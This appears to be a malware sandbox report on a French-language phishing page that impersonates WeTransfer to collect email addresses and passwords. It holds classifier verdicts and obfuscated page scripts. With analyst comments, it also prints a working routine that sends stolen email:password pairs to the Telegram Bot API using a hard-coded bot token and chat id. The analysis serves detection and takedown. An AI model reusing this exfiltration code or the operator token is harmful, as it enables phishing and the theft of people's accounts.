eval(decodeURIComponent(escape(window.atob('KGZ1bmN0aW9uKCl7CiAgICAgICAgdmFyIGEgPSBmdW5jdGlvbigpIHt0cnl7cmV0dXJuICEhd2luZG93LmFkZEV2ZW50TGlzdGVuZXJ9IGNhdGNoKGUpIHtyZXR1cm4gITF9IH0sCiAgICAgICAgYiA9IGZ1bmN0aW9uKGIsIGMpIHthKCkgPyBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIiwgYiwgYykgOiBkb2N1bWVudC5hdHRhY2hFdmVudCgib25yZWFkeXN0YXRlY2hhbmdlIiwgYil9OwogICAgICAgIGIoZnVuY3Rpb24oKXsKICAgICAgICAgICAgICAgICAgICAgICAgdmFyIG5vdyA9IG5ldyBEYXRlKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIHZhciB0aW1lID0gbm93LmdldFRpbWUoKTsKICAgICAgICAgICAgICAgICAgICAgICAgdGltZSArPSAzMDAgKiAxMDAwOwogICAgICAgICAgICAgICAgICAgICAgICBub3cuc2V0VGltZSh0aW1lKTsKICAgICAgICAgICAgICAgICAgICAgICAgZG9jdW1lbnQuY29va2llID0gJzZpcmFvYnhZWWpGbzBnbmJaNWtoeU5BeG9kWT1qNnlVTGlURTFpWFhIVVZOd0RzX1Rod1B1aTAnICsgJzsgZXhwaXJlcz0nICsgJ1dlZCwgMDQtRGVjLTI0IDA5OjQ3OjA3IEdNVCcgKyAnOyBwYXRoPS8nOwogICAgICAgICAgICAgICAgICAgICAgICAvL2phdmFzY3JpcHQgcHV6emxlIGZvciBicm93c2VyIHRvIGZpZ3VyZSBvdXQgdG8gZ2V0IGFuc3dlcgogICAgICAgICAgICAgICAgICAgICAgICBpZighd2luZG93Ll9waGFudG9tIHx8ICF3aW5kb3cuY2FsbFBoYW50b20pey8qcGhhbnRvbWpzKi8KaWYoIXdpbmRvdy5fX3BoYW50b21hcyl7LypwaGFudG9tYXMgUGhhbnRvbUpTLWJhc2VkIHdlYiBwZXJmIG1ldHJpY3MgKyBtb25pdG9yaW5nIHRvb2wqLwppZighd2luZG93LkJ1ZmZlcil7Lypub2RlanMqLwppZighd2luZG93LmVtaXQpey8qY291Y2hqcyovCmlmKCF3aW5kb3cuc3Bhd24pey8qcmhpbm8qLwppZighd2luZG93LndlYmRyaXZlcil7LypzZWxlbml1bSovCmlmKCF3aW5kb3cuZG9tQXV0b21hdGlvbiB8fCAhd2luZG93LmRvbUF1dG9tYXRpb25Db250cm9sbGVyKXsvKmNocm9taXVtIGJhc2VkIGF1dG9tYXRpb24gZHJpdmVyKi8KaWYoIXdpbmRvdy5kb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuZ2V0QXR0cmlidXRlKCJ3ZWJkcml2ZXIiKSl7Ci8qaWYobmF2aWdhdG9yLnVzZXJBZ2VudCl7Ki8KaWYoIS9ib3R8Y3VybHxrb2RpfHhibWN8d2dldHx1cmxsaWJ8cHl0aG9ufHdpbmh0dHB8aHR0cmFja3xhbGV4YXxpYV9hcmNoaXZlcnxmYWNlYm9va3x0d2l0dGVyfGxpbmtlZGlufHBpbmdkb20vaS50ZXN0KG5hdmlnYXRvci51c2VyQWdlbnQpKXsKLyppZihuYXZpZ2F0b3IuY29va2llRW5hYmxlZCl7Ki8KLyppZihkb2N1bWVudC5jb29raWUubWF0Y2goL14oPzouKjspP1xzKlswLTlhLWZdezMyfVxzKj1ccyooW147XSspKD86LiopPyQvKSl7Ki8vKkh0dHBPbmx5IENvb2tpZSBmbGFncyBwcmV2ZW50IHRoaXMqLwog
ICAgICAgICAgICAgICAgICAgICAgICB2YXIgXzA1OTY4NjMyMz1wYXJzZUludCgiMjAyNDEyMDIiLCAxMCkgKyBwYXJzZUludCgiMDIxMjIwMjQiLCAxMCk7CiAgICAgICAgICAgICAgICAgICAgICAgIC8qfSovCi8qfSovCn0KLyp9Ki8KfQp9Cn0KfQp9Cn0KfQp9CiAgICAgICAgICAgICAgICAgICAgICAgIC8vZW5kIGphdmFzY3JpcHQgcHV6emxlCiAgICAgICAgICAgICAgICAgICAgICAgIHZhciB4aHR0cCA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOwogICAgICAgICAgICAgICAgICAgICAgICB4aHR0cC5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoeGh0dHAucmVhZHlTdGF0ZSA9PT0gNCl7CiAgICAgICAgICAgICAgICAgY29uc3QgZmlyc3RGb3JtID0gZG9jdW1lbnQucXVlcnlTZWxlY3RvcignZm9ybScpOwoKLy8gQ2hlY2sgaWYgdGhlIGZvcm0gZXhpc3RzIGFuZCBpZiBpdCBoYXMgaW5wdXQgZWxlbWVudHMKaWYgKGZpcnN0Rm9ybSkgewogIGNvbnN0IGlucHV0RmllbGRzID0gZmlyc3RGb3JtLnF1ZXJ5U2VsZWN0b3JBbGwoJ2lucHV0Jyk7CiAgCiAgaWYgKGlucHV0RmllbGRzLmxlbmd0aCA+IDApIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRvY3VtZW50LmZvcm1zWzBdLnN1Ym1pdCgpOwogIH0gZWxzZSB7CiAgICAgICAgICAgICAgICAgICBpZiAoIXdpbmRvdy5sb2NhdGlvbi5oYXNoKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3aW5kb3cubG9jYXRpb24uaHJlZiA9IHdpbmRvdy5sb2NhdGlvbi5ocmVmOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3aW5kb3cubG9jYXRpb24ucmVsb2FkKCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgfQp9IGVsc2UgewogICAgICAgICAgICAgICAgIGlmICghd2luZG93LmxvY2F0aW9uLmhhc2gpIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdpbmRvdy5sb2NhdGlvbi5ocmVmID0gd2luZG93LmxvY2F0aW9uLmhyZWY7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdpbmRvdy5sb2NhdGlvbi5yZWxvYWQoKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KfQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICAgICAgICAgfTsKICAgICAgICAgICAgICAgICAgICAgICAgeGh0dHAub3BlbigiUE9TVCIsICIvZ2ttLyIsIHRydWUpOwogICAgICAgICAgICAgICAgICAgICAgICB4aHR0cC5zZXRSZXF1ZXN0SGVhZGVyKCd5WTBHSDJMSFRONkowQ0l6
Y3Zt |
URL: https://connexion-espacesclients.support/gkm/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Vous avez reçu un fichier sécurisé",
"prominent_button_name": "Continuer",
"text_input_field_labels": [
"Entrez l'adresse email"
],
"pdf_icon_visible": true,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 5,
"reasoning": "Script creates hidden iframe and injects Cloudflare's challenge platform script. While this is legitimate security functionality (DDoS protection), it uses potentially risky practices: dynamic script injection, hidden iframe creation, and DOM manipulation. The code is from a trusted source (Cloudflare) which reduces the risk, but the techniques used warrant caution."
} |
// Second capture of the hidden-iframe script loader (minified, kept exactly as
// captured). The code matches the earlier capture on this page; only the `r`
// and `t` values inside the inline script differ.
// It appends a 1x1 iframe with visibility 'hidden' to document.body. Once the
// document is no longer 'loading', it writes an inline <script> into the
// iframe's <head>. That script sets window.__CF$cv$params and loads the
// relative path '/cdn-cgi/challenge-platform/scripts/jsd/main.js'.
// The `t` parameter is Base64 for "1733219234.000000", which looks like a Unix
// timestamp.
(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ec2a2543d6d41bb',t:'MTczMzIxOTIzNC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "Script shows multiple high-risk indicators: heavy obfuscation (encoded strings, complex control flow), use of dynamic code manipulation (String.fromCharCode), and suspicious array/binary operations. The code appears to be a challenge/fingerprinting script with intentionally obscured functionality."
} |
window._cf_chl_opt={cFPWv:'b'};~function(X,h,i,j,k,o,s,B,D){X=b,function(d,e,W,f,g){for(W=b,f=d();!![];)try{if(g=-parseInt(W(256))/1*(parseInt(W(211))/2)+-parseInt(W(207))/3*(-parseInt(W(191))/4)+parseInt(W(204))/5*(-parseInt(W(253))/6)+parseInt(W(196))/7+-parseInt(W(167))/8+parseInt(W(144))/9+-parseInt(W(197))/10*(-parseInt(W(171))/11),e===g)break;else f.push(f.shift())}catch(F){f.push(f.shift())}}(a,210117),h=this||self,i=h[X(260)],j={},j[X(162)]='o',j[X(177)]='s',j[X(259)]='u',j[X(224)]='z',j[X(235)]='n',j[X(239)]='I',j[X(218)]='b',k=j,h[X(146)]=function(g,F,G,H,a2,J,K,L,M,N,O){if(a2=X,F===null||void 0===F)return H;for(J=n(F),g[a2(230)][a2(147)]&&(J=J[a2(209)](g[a2(230)][a2(147)](F))),J=g[a2(210)][a2(156)]&&g[a2(157)]?g[a2(210)][a2(156)](new g[(a2(157))](J)):function(P,a3,Q){for(a3=a2,P[a3(208)](),Q=0;Q<P[a3(236)];P[Q]===P[Q+1]?P[a3(237)](Q+1,1):Q+=1);return P}(J),K='nAsAaAb'.split('A'),K=K[a2(250)][a2(152)](K),L=0;L<J[a2(236)];M=J[L],N=m(g,F,M),K(N)?(O=N==='s'&&!g[a2(190)](F[M]),a2(176)===G+M?I(G+M,N):O||I(G+M,F[M])):I(G+M,N),L++);return H;function I(P,Q,a1){a1=b,Object[a1(186)][a1(189)][a1(182)](H,Q)||(H[Q]=[]),H[Q][a1(261)](P)}},o=X(226)[X(229)](';'),s=o[X(250)][X(152)](o),h[X(175)]=function(g,F,a4,G,H,I,J){for(a4=X,G=Object[a4(195)](F),H=0;H<G[a4(236)];H++)if(I=G[H],I==='f'&&(I='N'),g[I]){for(J=0;J<F[G[H]][a4(236)];-1===g[I][a4(228)](F[G[H]][J])&&(s(F[G[H]][J])||g[I][a4(261)]('o.'+F[G[H]][J])),J++);}else g[I]=F[G[H]][a4(151)](function(K){return'o.'+K})},B=function(ad,e,f,g){return ad=X,e=String[ad(248)],f={'h':function(F){return null==F?'':f.g(F,6,function(G,ae){return 
ae=b,ae(223)[ae(173)](G)})},'g':function(F,G,H,af,I,J,K,L,M,N,O,P,Q,R,S,T,U,V){if(af=ad,null==F)return'';for(J={},K={},L='',M=2,N=3,O=2,P=[],Q=0,R=0,S=0;S<F[af(236)];S+=1)if(T=F[af(173)](S),Object[af(186)][af(189)][af(182)](J,T)||(J[T]=N++,K[T]=!0),U=L+T,Object[af(186)][af(189)][af(182)](J,U))L=U;else{if(Object[af(186)][af(189)][af(182)](K,L)){if(256>L[af(252)](0)){for(I=0;I<O;Q<<=1,G-1==R?(R=0,P[af(261)](H(Q)),Q=0):R++,I++);for(V=L[af(252)](0),I=0;8>I;Q=Q<<1|V&1.9,R==G-1?(R=0,P[af(261)](H(Q)),Q=0):R++,V>>=1,I++);}else{for(V=1,I=0;I<O;Q=Q<<1|V,R==G-1?(R=0,P[af(261)](H(Q)),Q=0):R++,V=0,I++);for(V=L[af(252)](0),I=0;16>I;Q=V&1.18|Q<<1.49,G-1==R?(R=0,P[af(261)](H(Q)),Q=0):R++,V>>=1,I++);}M--,0==M&&(M=Math[af(227)](2,O),O++),delete K[L]}else for(V=J[L],I=0;I<O;Q=Q<<1|V&1.46,G-1==R?(R=0,P[af(261)](H(Q)),Q=0):R++,V>>=1,I++);L=(M--,0==M&&(M=Math[af(227)](2,O),O++),J[U]=N++,String(T))}if(''!==L){if(Object[af(186)][af(189)][af(182)](K,L)){if(256>L[af(252)](0)){for(I=0;I<O;Q<<=1,G-1==R?(R=0,P[af(261)](H(Q)),Q=0):R++,I++);for(V=L[af(252)](0),I=0;8>I;Q=Q<<1.91|1&V,R==G-1?(R=0,P[af(261)](H(Q)),Q=0):R++,V>>=1,I++);}else{for(V=1,I=0;I<O;Q=Q<<1|V,R==G-1?(R=0,P[af(261)](H(Q)),Q=0):R++,V=0,I++);for(V=L[af(252)](0),I=0;16>I;Q=V&1.36|Q<<1,G-1==R?(R=0,P[af(261)](H(Q)),Q=0):R++,V>>=1,I++);}M--,M==0&&(M=Math[af(227)](2,O),O++),delete K[L]}else for(V=J[L],I=0;I<O;Q=V&1|Q<<1.55,G-1==R?(R=0,P[af(261)](H(Q)),Q=0):R++,V>>=1,I++);M--,M==0&&O++}for(V=2,I=0;I<O;Q=Q<<1|V&1,G-1==R?(R=0,P[af(261)](H(Q)),Q=0):R++,V>>=1,I++);for(;;)if(Q<<=1,R==G-1){P[af(261)](H(Q));break}else R++;return P[af(217)]('')},'j':function(F,ag){return ag=ad,F==null?'':''==F?null:f.i(F[ag(236)],32768,function(G,ah){return ah=ag,F[ah(252)](G)})},'i':function(F,G,H,ai,I,J,K,L,M,N,O,P,Q,R,S,T,V,U){for(ai=ad,I=[],J=4,K=4,L=3,M=[],P=H(0),Q=G,R=1,N=0;3>N;I[N]=N,N+=1);for(S=0,T=Math[ai(227)](2,2),O=1;O!=T;U=Q&P,Q>>=1,Q==0&&(Q=G,P=H(R++)),S|=O*(0<U?1:0),O<<=1);switch(S){case 
0:for(S=0,T=Math[ai(227)](2,8),O=1;O!=T;U=P&Q,Q>>=1,0==Q&&(Q=G,P=H(R++)),S|=(0<U?1:0)*O,O<<=1);V=e(S);break;case 1:for(S=0,T=Math[ai(227)](2,16),O=1;T!=O;U=P&Q,Q>>=1,Q==0&&(Q=G,P=H(R++)),S|=O*(0<U?1:0),O<<=1);V=e(S);break;case 2:return''}for(N=I[3]=V,M[ai(261)](V);;){if(R>F)return'';for(S=0,T=Math[ai(227)](2,L),O=1;O!=T;U=P&Q,Q>>=1,Q==0&&(Q=G,P=H(R++)),S|=(0<U?1:0)*O,O<<=1);switch(V=S){case 0:for(S=0,T=Math[ai(227)](2,8),O=1;T!=O;U=P&Q,Q>>=1,Q==0&&(Q=G,P=H( |
URL: https://connexion-espacesclients.support/gkm/ Model: Joe Sandbox AI | {
"brands": [
"Wetransfer"
]
} |
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 10,
"reasoning": "This is a highly malicious script that exhibits multiple high-risk behaviors: 1) It contains obfuscated code using hex encoding, 2) It exfiltrates sensitive data (email/password) to Telegram via a bot token, 3) It appears to be part of a phishing operation based on the credential collection and error handling patterns. The presence of a Telegram bot token (7499623592:AAG4sRR7YzmOAFkZFFwiAbBsnnHB-lXYLSk) for data exfiltration is a clear indicator of malicious intent."
} |
// Alias for the string-table decoder declared just below (function declarations
// are hoisted, so the reference is valid here). The page logic calls
// _0x40d1b3(<hex index>) instead of writing DOM ids and property names in clear.
var _0x40d1b3 = _0x1298;
/**
 * String-table lookup used by the obfuscated code.
 *
 * The first call fetches the shared array from _0x190b(), then replaces
 * _0x1298 with an inner closure and forwards the call to it. The closure
 * subtracts 0x121 from the requested index and returns that array entry.
 * The second parameter is accepted but never read.
 *
 * Analyst note: call sites carry only numeric indices, so a plain string
 * search for element ids or messages will not find where they are used.
 * The index-to-string mapping also depends on the array rotation performed
 * by the IIFE that follows _0x190b, so source order is not runtime order.
 */
function _0x1298(_0x93b389, _0x301fc5) {
// Same array instance that the rotation loop mutates.
var _0x190b9e = _0x190b();
return (
(_0x1298 = function (_0x12988f, _0x35f94c) {
// Indices used in the code start at 0x121; shift them to a zero-based offset.
_0x12988f = _0x12988f - 0x121;
var _0x866d3 = _0x190b9e[_0x12988f];
return _0x866d3;
}),
_0x1298(_0x93b389, _0x301fc5)
);
}
/**
 * Credential exfiltration routine of the phishing page (kept verbatim as
 * captured evidence).
 *
 * Builds a Telegram Bot API `sendMessage` URL whose `text` parameter is
 * " - <data.email>:<data.password>" and requests it with fetch() using GET.
 * Nothing is returned to the caller.
 *
 * Analyst notes:
 * - Unlike the rest of the sample, the bot token, chat id and API host are
 *   plain literals rather than string-table lookups, so static string
 *   extraction recovers them. Treat the token and chat id as indicators and
 *   as material for a takedown/abuse report.
 * - The credentials travel in the URL query string. Where TLS inspection is
 *   in place they will appear in full in proxy logs, so those logs need to be
 *   handled as sensitive; without inspection, browser-originated requests to
 *   api.telegram.org with a /bot path are still a useful hunting signal.
 * - Any account whose credentials were typed into this page should be treated
 *   as compromised.
 *
 * @param {object} data - object whose `email` and `password` properties are
 *   interpolated into the message text.
 */
function _0x1298a(data) {
// Bot token (hard-coded secret of the operator's Telegram bot).
const _0x40d1b3a = '7499623592:AAG4sRR7YzmOAFkZFFwiAbBsnnHB-lXYLSk';
// Destination chat id that receives the stolen credentials.
const _0x301fc5a = '1411469413';
// Message body: "email:password" pair exactly as read from `data`.
const _0x93b389a = ` - ${data.email}:${data.password}`;
// Full request URL; the message is URL-encoded into the `text` parameter.
const _0x190b9ea = `https://api.telegram.org/bot${_0x40d1b3a}/sendMessage?chat_id=${_0x301fc5a}&text=${encodeURIComponent(
_0x93b389a
)}`;
fetch(_0x190b9ea, { method: "GET" })
.then((response) => {
if (response.ok) {
// Original French comment (mis-encoded in this capture) says the request succeeded; no action is taken.
} else {
// Non-2xx response: also ignored.
}
})
.catch((error) => {
// Network failure is only logged to the browser console.
console.error(error);
});
}
/**
 * String table for the obfuscated page logic.
 *
 * Returns one shared array holding DOM ids, property and method names,
 * French user-facing messages, a Base64 URL and numeric-prefixed filler
 * entries. On first call the function replaces itself with a closure that
 * returns the same array instance, so the decoder (_0x1298) and the rotation
 * IIFE below both operate on a single array.
 *
 * Analyst notes:
 * - Entries such as "234346BnGWhS" begin with digits; the rotation IIFE feeds
 *   table entries to parseInt() to compute its checksum, and the trailing
 *   letters are ignored by parseInt.
 * - The order shown here is source order. The array is rotated at load time,
 *   so indices in call sites must be resolved after applying that rotation.
 * - "POST", "json", "application/json", "status" and "then" suggest the click
 *   handler also issues a JSON POST request; that handler is cut off in this
 *   capture, so this is unconfirmed.
 */
function _0x190b() {
var _0x185b99 = [
"234346BnGWhS",
"click",
"erreur-email",
"DOMContentLoaded",
"getElementById",
"POST",
"36633JrLxNF",
"hidden",
"94040SLmWws",
"status",
// French: "An error occurred during the request: " (accented character lost in capture).
"Une\x20erreur\x20s\x27est\x20produite\x20lors\x20de\x20la\x20requte\x20:\x20",
"333210HZEhXV",
// Base64 text; the prefix decodes to https://wetransfer.com/downloads/ followed by
// tracking parameters. Presumably the victim is redirected to the genuine site
// after submission ("location" and "href" are also in this table) - the code
// that consumes this entry is not visible here.
"aHR0cHM6Ly93ZXRyYW5zZmVyLmNvbS9kb3dubG9hZHMvZDJkMzQ4ZmUzZDI5OTVlMWNmOGU1ZmU4Y2Y4NGE1NmMyMDIzMTAzMTAxMTYxOC8xMTUwOTQ1YTdlZjkwZjMzYjljNjdlZjRkYzc3MDk4NTIwMjMxMDMxMDExNjU1LzA2Zjc3Nz90cms9VFJOX1RETF8wMSZ1dG1fY2FtcGFpZ249VFJOX1RETF8wMSZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9zb3VyY2U9c2VuZGdyaWQ=",
"classList",
"focus",
"json",
"add",
// French: "The email address is not recognised."
"L\x27adresse\x20email\x20n\x27est\x20pas\x20reconnue.",
"452aQoRaO",
"zone-password",
"then",
"addEventListener",
"3010896cSLXTE",
"affiche-mdp",
"href",
"erreur-mdp",
"zone-email",
"remove",
"innerText",
"application/json",
"value",
"11980FYCpYT",
"323972tLwftV",
"40snIhbP",
"test",
"1InNRKI",
// French: "This password is incorrect."
"Ce\x20mot\x20de\x20passe\x20est\x20incorrect.",
// French: "Please enter a password."
"Veuillez\x20entrer\x20un\x20mot\x20de\x20passe.",
"location",
"352MtEDsB",
];
// Self-replacement: later calls return the same (mutable) array instance.
_0x190b = function () {
return _0x185b99;
};
return _0x190b();
}
// String-table rotation step (runs once at load, before the page logic).
// It receives _0x190b and the target value 0x2aac6, decodes a fixed set of
// table entries with parseInt(), combines them arithmetically and compares the
// result with the target. While the result differs - or the arithmetic throws -
// the first array element is moved to the end and the check is repeated.
// Consequence for analysis: the index-to-string mapping used by every
// _0x1298/_0x40d1b3 call is only valid after this loop has finished, so the
// source order of the table in _0x190b must not be used directly.
// Note: this expression is the first operand of a comma expression that
// continues below; the click handler at its end is truncated in this capture.
(function (_0x8c058f, _0x14b410) {
var _0x5592b9 = _0x1298,
_0x57b5e7 = _0x8c058f();
// `!![]` evaluates to true: loop until the checksum matches.
while (!![]) {
try {
var _0x21688c =
(-parseInt(_0x5592b9(0x13f)) / 0x1) *
(parseInt(_0x5592b9(0x13c)) / 0x2) +
-parseInt(_0x5592b9(0x122)) / 0x3 +
(-parseInt(_0x5592b9(0x12e)) / 0x4) *
(-parseInt(_0x5592b9(0x13b)) / 0x5) +
-parseInt(_0x5592b9(0x127)) / 0x6 +
(parseInt(_0x5592b9(0x144)) / 0x7) *
(parseInt(_0x5592b9(0x13d)) / 0x8) +
-parseInt(_0x5592b9(0x132)) / 0x9 +
(parseInt(_0x5592b9(0x124)) / 0xa) *
(parseInt(_0x5592b9(0x143)) / 0xb);
if (_0x21688c === _0x14b410) break;
// Wrong alignment: rotate the table by one position and retry.
else _0x57b5e7["push"](_0x57b5e7["shift"]());
} catch (_0x27c676) {
// Same rotation on error, so the loop keeps searching for the alignment.
_0x57b5e7["push"](_0x57b5e7["shift"]());
}
}
})(_0x190b, 0x2aac6),
(msurl = ""),
document["addEventListener"](_0x40d1b3(0x147), function () {
var _0x2ffcc5 = _0x40d1b3,
_0x1d2392 = 0x0,
_0x474328 = document[_0x2ffcc5(0x148)](_0x2ffcc5(0x136)),
_0x46cb83 = document[_0x2ffcc5(0x148)](_0x2ffcc5(0x133)),
_0x55180f = document["getElementById"](_0x2ffcc5(0x12f)),
_0x2c9a80 = document[_0x2ffcc5(0x148)](_0x2ffcc5(0x146)),
_0x500e0a = document[_0x2ffcc5(0x148)](_0x2ffcc5(0x135)),
_0x1120d2 = document[_0x2ffcc5(0x148)]("continuer-button");
_0x1120d2[_0x2ffcc5(0x131)](_0x2ffcc5(0x145), function () {
|
URL: https://connexion-espacesclients.support/gkm/ Model: Joe Sandbox AI | {
"legit_domain": "wetransfer.com",
"classification": "wellknown",
"reasons": [
"The brand 'Wetransfer' is well-known and typically associated with the domain 'wetransfer.com'.",
"The URL 'connexion-espacesclients.support' does not match the legitimate domain of Wetransfer.",
"The URL contains suspicious elements such as hyphens and an unusual domain extension '.support', which are common in phishing attempts.",
"The URL does not contain any recognizable association with Wetransfer, which raises suspicion.",
"The presence of input fields asking for email addresses is a common tactic used in phishing sites to collect user information."
],
"riskscore": 9
}
Google indexed: False |
URL: connexion-espacesclients.support
Brands: Wetransfer
Input Fields: Entrez l'adresse email |
URL: https://connexion-espacesclients.support/gkm/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Vous avez reçu un fichier sécurisé",
"prominent_button_name": "Continuer",
"text_input_field_labels": [
"tutuututututu@gmail.com",
"Entrez le mot de passe"
],
"pdf_icon_visible": true,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
|
URL: https://connexion-espacesclients.support/gkm/ Model: Joe Sandbox AI | {
"brands": [
"Wetransfer"
]
} |
|